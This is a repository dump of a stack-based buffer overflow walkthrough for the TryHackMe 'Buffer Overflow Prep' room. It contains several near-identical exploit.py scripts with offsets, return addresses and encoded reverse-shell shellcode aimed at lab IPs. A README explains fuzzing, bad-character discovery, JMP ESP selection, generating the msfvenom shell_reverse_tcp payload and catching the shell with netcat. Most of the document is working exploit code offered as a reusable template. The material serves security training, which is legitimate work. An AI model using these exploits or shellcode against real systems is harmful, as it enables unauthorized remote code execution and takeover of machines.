"\x89\x8a\xda\x2d\x40\x0f\xfa\xcf\x40\x7a\x93\x49\x01\xc7\xfe" 35 | "\x69\xfc\x04\x07\xea\xf4\xf4\xfc\xf2\x7d\xf0\xb9\xb4\x6e\x88" 36 | "\xd2\x50\x90\x3f\xd2\x70") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW8/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.5.108" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW8 " 9 | offset = 1786 10 | overflow = "A" * offset 11 | retn = "\x03\x12\x50\x62" # 62501203 12 | padding = "\x90" * 16 13 | payload = ("\xbb\xa9\xd1\x1e\x62\xda\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" 14 | "\x52\x83\xea\xfc\x31\x5a\x0e\x03\xf3\xdf\xfc\x97\xff\x08\x82" 15 | "\x58\xff\xc8\xe3\xd1\x1a\xf9\x23\x85\x6f\xaa\x93\xcd\x3d\x47" 16 | "\x5f\x83\xd5\xdc\x2d\x0c\xda\x55\x9b\x6a\xd5\x66\xb0\x4f\x74" 17 | "\xe5\xcb\x83\x56\xd4\x03\xd6\x97\x11\x79\x1b\xc5\xca\xf5\x8e" 18 | "\xf9\x7f\x43\x13\x72\x33\x45\x13\x67\x84\x64\x32\x36\x9e\x3e" 19 | "\x94\xb9\x73\x4b\x9d\xa1\x90\x76\x57\x5a\x62\x0c\x66\x8a\xba" 20 | "\xed\xc5\xf3\x72\x1c\x17\x34\xb4\xff\x62\x4c\xc6\x82\x74\x8b" 21 | "\xb4\x58\xf0\x0f\x1e\x2a\xa2\xeb\x9e\xff\x35\x78\xac\xb4\x32" 22 | "\x26\xb1\x4b\x96\x5d\xcd\xc0\x19\xb1\x47\x92\x3d\x15\x03\x40" 23 | "\x5f\x0c\xe9\x27\x60\x4e\x52\x97\xc4\x05\x7f\xcc\x74\x44\xe8" 24 | "\x21\xb5\x76\xe8\x2d\xce\x05\xda\xf2\x64\x81\x56\x7a\xa3\x56" 25 | "\x98\x51\x13\xc8\x67\x5a\x64\xc1\xa3\x0e\x34\x79\x05\x2f\xdf" 26 | "\x79\xaa\xfa\x70\x29\x04\x55\x31\x99\xe4\x05\xd9\xf3\xea\x7a" 27 | "\xf9\xfc\x20\x13\x90\x07\xa3\x16\x61\x2f\xeb\x4f\x6b\x2f\x1a" 28 | "\xcc\xe2\xc9\x76\xfc\xa2\x42\xef\x65\xef\x18\x8e\x6a\x25\x65" 29 | "\x90\xe1\xca\x9a\x5f\x02\xa6\x88\x08\xe2\xfd\xf2\x9f\xfd\x2b" 30 | "\x9a\x7c\x6f\xb0\x5a\x0a\x8c\x6f\x0d\x5b\x62\x66\xdb\x71\xdd" 31 | "\xd0\xf9\x8b\xbb\x1b\xb9\x57\x78\xa5\x40\x15\xc4\x81\x52\xe3" 32 | "\xc5\x8d\x06\xbb\x93\x5b\xf0\x7d\x4a\x2a\xaa\xd7\x21\xe4\x3a" 33 | "\xa1\x09\x37\x3c\xae\x47\xc1\xa0\x1f\x3e\x94\xdf\x90\xd6\x10" 34 | "\x98\xcc\x46\xde\x73\x55\x66\x3d\x51\xa0\x0f\x98\x30\x09\x52" 35 | "\x1b\xef\x4e\x6b\x98\x05\x2f\x88\x80\x6c\x2a\xd4\x06\x9d\x46" 36 | "\x45\xe3\xa1\xf5\x66\x26") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW9/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.5.108" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW9 " 9 | offset = 1514 10 | overflow = "A" * offset 11 | retn = "\xf7\x11\x50\x62" # 625011f7 12 | padding = "\x90" * 16 13 | payload = ("\xdb\xd6\xbd\x7c\xbe\xf4\xd4\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 14 | "\x52\x31\x6e\x17\x03\x6e\x17\x83\x92\x42\x16\x21\x96\x53\x55" 15 | "\xca\x66\xa4\x3a\x42\x83\x95\x7a\x30\xc0\x86\x4a\x32\x84\x2a" 16 | "\x20\x16\x3c\xb8\x44\xbf\x33\x09\xe2\x99\x7a\x8a\x5f\xd9\x1d" 17 | "\x08\xa2\x0e\xfd\x31\x6d\x43\xfc\x76\x90\xae\xac\x2f\xde\x1d" 18 | "\x40\x5b\xaa\x9d\xeb\x17\x3a\xa6\x08\xef\x3d\x87\x9f\x7b\x64" 19 | "\x07\x1e\xaf\x1c\x0e\x38\xac\x19\xd8\xb3\x06\xd5\xdb\x15\x57" 20 | "\x16\x77\x58\x57\xe5\x89\x9d\x50\x16\xfc\xd7\xa2\xab\x07\x2c" 21 | "\xd8\x77\x8d\xb6\x7a\xf3\x35\x12\x7a\xd0\xa0\xd1\x70\x9d\xa7" 22 | "\xbd\x94\x20\x6b\xb6\xa1\xa9\x8a\x18\x20\xe9\xa8\xbc\x68\xa9" 23 | "\xd1\xe5\xd4\x1c\xed\xf5\xb6\xc1\x4b\x7e\x5a\x15\xe6\xdd\x33" 24 | "\xda\xcb\xdd\xc3\x74\x5b\xae\xf1\xdb\xf7\x38\xba\x94\xd1\xbf" 25 | "\xbd\x8e\xa6\x2f\x40\x31\xd7\x66\x87\x65\x87\x10\x2e\x06\x4c" 26 | "\xe0\xcf\xd3\xc3\xb0\x7f\x8c\xa3\x60\xc0\x7c\x4c\x6a\xcf\xa3" 27 | "\x6c\x95\x05\xcc\x07\x6c\xce\xf9\xd3\x46\xd6\x96\xd9\x96\xf7" 28 | "\x3a\x57\x70\x9d\xd2\x31\x2b\x0a\x4a\x18\xa7\xab\x93\xb6\xc2" 29 | "\xec\x18\x35\x33\xa2\xe8\x30\x27\x53\x19\x0f\x15\xf2\x26\xa5" 30 | "\x31\x98\xb5\x22\xc1\xd7\xa5\xfc\x96\xb0\x18\xf5\x72\x2d\x02" 31 | "\xaf\x60\xac\xd2\x88\x20\x6b\x27\x16\xa9\xfe\x13\x3c\xb9\xc6" 32 | "\x9c\x78\xed\x96\xca\xd6\x5b\x51\xa5\x98\x35\x0b\x1a\x73\xd1" 33 | "\xca\x50\x44\xa7\xd2\xbc\x32\x47\x62\x69\x03\x78\x4b\xfd\x83" 34 | "\x01\xb1\x9d\x6c\xd8\x71\xbd\x8e\xc8\x8f\x56\x17\x99\x2d\x3b" 35 | "\xa8\x74\x71\x42\x2b\x7c\x0a\xb1\x33\xf5\x0f\xfd\xf3\xe6\x7d" 36 | "\x6e\x96\x08\xd1\x8f\xb3") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW2/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.16.223" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW2 " 9 | offset = 634 10 | overflow = "A" * offset 11 | retn = "\xaf\x11\x50\x62" # 625011af 12 | padding = "\x90" * 16 13 | payload = ("\xfc\xbb\x8c\x28\x77\xd0\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3" 14 | "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x70\xc0\xf5\xd0\x88" 15 | "\x11\x9a\x59\x6d\x20\x9a\x3e\xe6\x13\x2a\x34\xaa\x9f\xc1\x18" 16 | "\x5e\x2b\xa7\xb4\x51\x9c\x02\xe3\x5c\x1d\x3e\xd7\xff\x9d\x3d" 17 | "\x04\xdf\x9c\x8d\x59\x1e\xd8\xf0\x90\x72\xb1\x7f\x06\x62\xb6" 18 | "\xca\x9b\x09\x84\xdb\x9b\xee\x5d\xdd\x8a\xa1\xd6\x84\x0c\x40" 19 | "\x3a\xbd\x04\x5a\x5f\xf8\xdf\xd1\xab\x76\xde\x33\xe2\x77\x4d" 20 | "\x7a\xca\x85\x8f\xbb\xed\x75\xfa\xb5\x0d\x0b\xfd\x02\x6f\xd7" 21 | "\x88\x90\xd7\x9c\x2b\x7c\xe9\x71\xad\xf7\xe5\x3e\xb9\x5f\xea" 22 | "\xc1\x6e\xd4\x16\x49\x91\x3a\x9f\x09\xb6\x9e\xfb\xca\xd7\x87" 23 | "\xa1\xbd\xe8\xd7\x09\x61\x4d\x9c\xa4\x76\xfc\xff\xa0\xbb\xcd" 24 | "\xff\x30\xd4\x46\x8c\x02\x7b\xfd\x1a\x2f\xf4\xdb\xdd\x50\x2f" 25 | "\x9b\x71\xaf\xd0\xdc\x58\x74\x84\x8c\xf2\x5d\xa5\x46\x02\x61" 26 | "\x70\xc8\x52\xcd\x2b\xa9\x02\xad\x9b\x41\x48\x22\xc3\x72\x73" 27 | "\xe8\x6c\x18\x8e\x7b\x99\xd9\xb8\xa3\xf5\xe3\xb8\x42\x5a\x6d" 28 | "\x5e\x0e\x72\x3b\xc9\xa7\xeb\x66\x81\x56\xf3\xbc\xec\x59\x7f" 29 | "\x33\x11\x17\x88\x3e\x01\xc0\x78\x75\x7b\x47\x86\xa3\x13\x0b" 30 | "\x15\x28\xe3\x42\x06\xe7\xb4\x03\xf8\xfe\x50\xbe\xa3\xa8\x46" 31 | "\x43\x35\x92\xc2\x98\x86\x1d\xcb\x6d\xb2\x39\xdb\xab\x3b\x06" 32 | "\x8f\x63\x6a\xd0\x79\xc2\xc4\x92\xd3\x9c\xbb\x7c\xb3\x59\xf0" 33 | "\xbe\xc5\x65\xdd\x48\x29\xd7\x88\x0c\x56\xd8\x5c\x99\x2f\x04" 34 | "\xfd\x66\xfa\x8c\x1d\x85\x2e\xf9\xb5\x10\xbb\x40\xd8\xa2\x16" 35 | "\x86\xe5\x20\x92\x77\x12\x38\xd7\x72\x5e\xfe\x04\x0f\xcf\x6b" 36 | "\x2a\xbc\xf0\xb9\x2a\x42\x0f\x42") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW3/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.16.223" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW3 " 9 | offset = 1274 10 | overflow = "A" * offset 11 | retn = "\x03\x12\x50\x62" # 62501203 12 | padding = "\x90" * 16 13 | payload = ("\xfc\xbb\xe3\x87\xa3\x63\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3" 14 | "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x1f\x6f\x21\x63\xdf" 15 | "\x70\x46\xed\x3a\x41\x46\x89\x4f\xf2\x76\xd9\x1d\xff\xfd\x8f" 16 | "\xb5\x74\x73\x18\xba\x3d\x3e\x7e\xf5\xbe\x13\x42\x94\x3c\x6e" 17 | "\x97\x76\x7c\xa1\xea\x77\xb9\xdc\x07\x25\x12\xaa\xba\xd9\x17" 18 | "\xe6\x06\x52\x6b\xe6\x0e\x87\x3c\x09\x3e\x16\x36\x50\xe0\x99" 19 | "\x9b\xe8\xa9\x81\xf8\xd5\x60\x3a\xca\xa2\x72\xea\x02\x4a\xd8" 20 | "\xd3\xaa\xb9\x20\x14\x0c\x22\x57\x6c\x6e\xdf\x60\xab\x0c\x3b" 21 | "\xe4\x2f\xb6\xc8\x5e\x8b\x46\x1c\x38\x58\x44\xe9\x4e\x06\x49" 22 | "\xec\x83\x3d\x75\x65\x22\x91\xff\x3d\x01\x35\x5b\xe5\x28\x6c" 23 | "\x01\x48\x54\x6e\xea\x35\xf0\xe5\x07\x21\x89\xa4\x4f\x86\xa0" 24 | "\x56\x90\x80\xb3\x25\xa2\x0f\x68\xa1\x8e\xd8\xb6\x36\xf0\xf2" 25 | "\x0f\xa8\x0f\xfd\x6f\xe1\xcb\xa9\x3f\x99\xfa\xd1\xab\x59\x02" 26 | "\x04\x7b\x09\xac\xf7\x3c\xf9\x0c\xa8\xd4\x13\x83\x97\xc5\x1c" 27 | "\x49\xb0\x6c\xe7\x1a\xb5\x74\xcf\x02\xa1\x76\x0f\xa2\x6e\xfe" 28 | "\xe9\xae\x9e\x56\xa2\x46\x06\xf3\x38\xf6\xc7\x29\x45\x38\x43" 29 | "\xde\xba\xf7\xa4\xab\xa8\x60\x45\xe6\x92\x27\x5a\xdc\xba\xa4" 30 | "\xc9\xbb\x3a\xa2\xf1\x13\x6d\xe3\xc4\x6d\xfb\x19\x7e\xc4\x19" 31 | "\xe0\xe6\x2f\x99\x3f\xdb\xae\x20\xcd\x67\x95\x32\x0b\x67\x91" 32 | "\x66\xc3\x3e\x4f\xd0\xa5\xe8\x21\x8a\x7f\x46\xe8\x5a\xf9\xa4" 33 | "\x2b\x1c\x06\xe1\xdd\xc0\xb7\x5c\x98\xff\x78\x09\x2c\x78\x65" 34 | "\xa9\xd3\x53\x2d\xc9\x31\x71\x58\x62\xec\x10\xe1\xef\x0f\xcf" 35 | "\x26\x16\x8c\xe5\xd6\xed\x8c\x8c\xd3\xaa\x0a\x7d\xae\xa3\xfe" 36 | "\x81\x1d\xc3\x2a\x81\xa1\x3b\xd5") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /OVERFLOW5/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | 5 | ip = "10.10.60.34" 6 | port = 1337 7 | 8 | prefix = "OVERFLOW5 " 9 | offset = 314 10 | overflow = "A" * offset 11 | retn = "\xbb\x11\x50\x62" # 625011bb 12 | padding = "\x90" * 16 13 | payload = ("\xfc\xbb\x0e\xcb\xc2\x8d\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3" 14 | "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xf2\x23\x40\x8d\x0a" 15 | "\xb4\x25\x07\xef\x85\x65\x73\x64\xb5\x55\xf7\x28\x3a\x1d\x55" 16 | "\xd8\xc9\x53\x72\xef\x7a\xd9\xa4\xde\x7b\x72\x94\x41\xf8\x89" 17 | "\xc9\xa1\xc1\x41\x1c\xa0\x06\xbf\xed\xf0\xdf\xcb\x40\xe4\x54" 18 | "\x81\x58\x8f\x27\x07\xd9\x6c\xff\x26\xc8\x23\x8b\x70\xca\xc2" 19 | "\x58\x09\x43\xdc\xbd\x34\x1d\x57\x75\xc2\x9c\xb1\x47\x2b\x32" 20 | "\xfc\x67\xde\x4a\x39\x4f\x01\x39\x33\xb3\xbc\x3a\x80\xc9\x1a" 21 | "\xce\x12\x69\xe8\x68\xfe\x8b\x3d\xee\x75\x87\x8a\x64\xd1\x84" 22 | "\x0d\xa8\x6a\xb0\x86\x4f\xbc\x30\xdc\x6b\x18\x18\x86\x12\x39" 23 | "\xc4\x69\x2a\x59\xa7\xd6\x8e\x12\x4a\x02\xa3\x79\x03\xe7\x8e" 24 | "\x81\xd3\x6f\x98\xf2\xe1\x30\x32\x9c\x49\xb8\x9c\x5b\xad\x93" 25 | "\x59\xf3\x50\x1c\x9a\xda\x96\x48\xca\x74\x3e\xf1\x81\x84\xbf" 26 | "\x24\x05\xd4\x6f\x97\xe6\x84\xcf\x47\x8f\xce\xdf\xb8\xaf\xf1" 27 | "\x35\xd1\x5a\x08\xde\xd4\x9e\x3a\xc6\x81\x9c\x3a\xe7\x0d\x28" 28 | "\xdc\x6d\xbe\x7c\x77\x1a\x27\x25\x03\xbb\xa8\xf3\x6e\xfb\x23" 29 | "\xf0\x8f\xb2\xc3\x7d\x83\x23\x24\xc8\xf9\xe2\x3b\xe6\x95\x69" 30 | "\xa9\x6d\x65\xe7\xd2\x39\x32\xa0\x25\x30\xd6\x5c\x1f\xea\xc4" 31 | "\x9c\xf9\xd5\x4c\x7b\x3a\xdb\x4d\x0e\x06\xff\x5d\xd6\x87\xbb" 32 | "\x09\x86\xd1\x15\xe7\x60\x88\xd7\x51\x3b\x67\xbe\x35\xba\x4b" 33 | "\x01\x43\xc3\x81\xf7\xab\x72\x7c\x4e\xd4\xbb\xe8\x46\xad\xa1" 34 | "\x88\xa9\x64\x62\xa8\x4b\xac\x9f\x41\xd2\x25\x22\x0c\xe5\x90" 35 | "\x61\x29\x66\x10\x1a\xce\x76\x51\x1f\x8a\x30\x8a\x6d\x83\xd4" 36 | "\xac\xc2\xa4\xfc\xac\xe4\x5a\xff") 37 | postfix = "" 38 | 39 | buffer = prefix + overflow + retn + padding + payload + postfix 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | 43 | try: 44 | s.connect((ip, port)) 45 | print("Sending evil buffer...") 46 | s.send(bytes(buffer + "\r\n", "latin-1")) 47 | print("Done!") 48 | except: 49 | print("Could not connect.") -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Stack Based Buffer Overflow Walkthrough 2 | I will be using Tib3rius's Buffer Overflow Prep on TryHackMe for practise. 3 | Link to room: https://tryhackme.com/room/bufferoverflowprep 4 | 5 | ## Mona Configuration 6 | Run the following command on Immunity Debugger to make the process easier: 7 | ``` 8 | !mona config -set workingfolder c:\mona\%p 9 | ``` 10 | 11 | ## Fuzzing 12 | 1. Open the application you are targetting on Immunity Debugger and hit start 13 | 2. Run `fuzzer.py` to identify the point that causes the application to crash 14 | 3. Note down the crash point of the application 15 | 16 | ## Offset 17 | To identify the offset to the EIP address, we can generate a string with the pattern_create module from Metasploit. 18 | Add 40 to the crash point found. 19 | ``` 20 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l [crash point + 40] 21 | ``` 22 | Then, 23 | 1. Copy the output and place it in the payload variable of `exploit.py`. 24 | 2. Run the script and it should crash the application again. 25 | 3. Change the distance to the same length of the pattern you created and run the command on Immunity Debugger: 26 | ``` 27 | !mona findmsp -distance [crash point + 40] 28 | ``` 29 | Mona will display the output of the command, or click "Window" menu and then "Log data" to view it. 30 | Find a line that states `EIP contains normal pattern : ... (offset XXXX)` 31 | Note down the offset and make the following changes to `exploit.py` script: 32 | 1. Update the offset variable 33 | 2. Set the payload variable to an empty string 34 | 3. Set the retn variable to `BBBB` 35 | 36 | Restart the application in Immunity Debugger and run the modified script. 37 | The EIP register should now be overwritten with B's: `42424242` 38 | 39 | ## Finding Bad Characters 40 | Using Mona, we can generate a byte array and exclude the null byte,`\x00`, by default. 41 | Execute the following command: 42 | ``` 43 | !mona bytearray -b "\x00" 44 | ``` 45 | Then, follow these steps: 46 | 1. Execute `badchars.py` to generate a string of bad chars from `\x01 to \xff`. 47 | 2. Update `exploit.py` and set the payload variable to the string created. 48 | 3. Restart the application in Immunity Debugger and run the script again. 49 | 4. Copy the address to which the ESP register points and use it in the following command: 50 | ``` 51 | !mona compare -f C:\mona\oscp\bytearray.bin -a
52 | ``` 53 | 54 | A mona Memory comparison results window will appear indicating the characters that are different in memory to what they are in the generated `bytearray.bin` file. 55 | Not all of these might be bad characters as sometimes: 56 | 1. Bad characters cause the next byte to get corrupted 57 | 2. Bad characters cause the rest of the string to get corrupted 58 | 59 | Make a note of the bad characters and do the following: 60 | 1. Generate a new byte array in mona, specifying these new bad characters along with `\x00` 61 | 2. Remove the new bad characters in the payload variable in exploit.py 62 | 63 | Restart the application in Immunity Debugger and run the script again. 64 | Repeat the process until the results status returns `Unmodified`. This indicates that there are no more bad characters. 65 | 66 | ## Finding a JMP point 67 | 68 | Run the following command in Immunity Debugger with the application running or in a crashed state. 69 | Ensure that all the bad characters identified are added in. 70 | ``` 71 | !mona jmp -r esp -cpb "\x00" 72 | ``` 73 | The results should display in the 'Log data' window. Choose an address and update it in `exploit.py` by setting the `retn` variable to the address written backwards. 74 | For example, if the address found is `\x01\x02\x03\x04`, write `\x04\x03\x02\x01` in `exploit.py`. 75 | 76 | ## Generate a Payload 77 | We can finally generate our shellcode excluding the bad characters found: 78 | ``` 79 | msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c 80 | ``` 81 | Insert the string added to the payload variable in `exploit.py` in the following format: 82 | ``` 83 | payload = ("\xfc\xbb\xa1\x8a\x96\xa2\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3" 84 | "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x5d\x62\x14\xa2\x9d" 85 | ... 86 | "\xf7\x04\x44\x8d\x88\xf2\x54\xe4\x8d\xbf\xd2\x15\xfc\xd0\xb6" 87 | "\x19\x53\xd0\x92\x19\x53\x2e\x1d") 88 | ``` 89 | Ensure to place an open bracket at the start, and a close bracket at the end. 90 | 91 | ## Prepend NOPs 92 | An encoder was used to generate the payload. Thus, some space in memory is needed for the payload to unpack itself. Ensure this happens by assigning the following string to the padding variable: 93 | ``` 94 | padding = "\x90" * 16 95 | ``` 96 | 97 | ## Exploit 98 | 1. Start a Netcat listener on Kali 99 | 2. Restart the application in Immunity Debugger 100 | 3. Run `exploit.py` 101 | 102 | You should catch a reverse shell! 103 | --------------------------------------------------------------------------------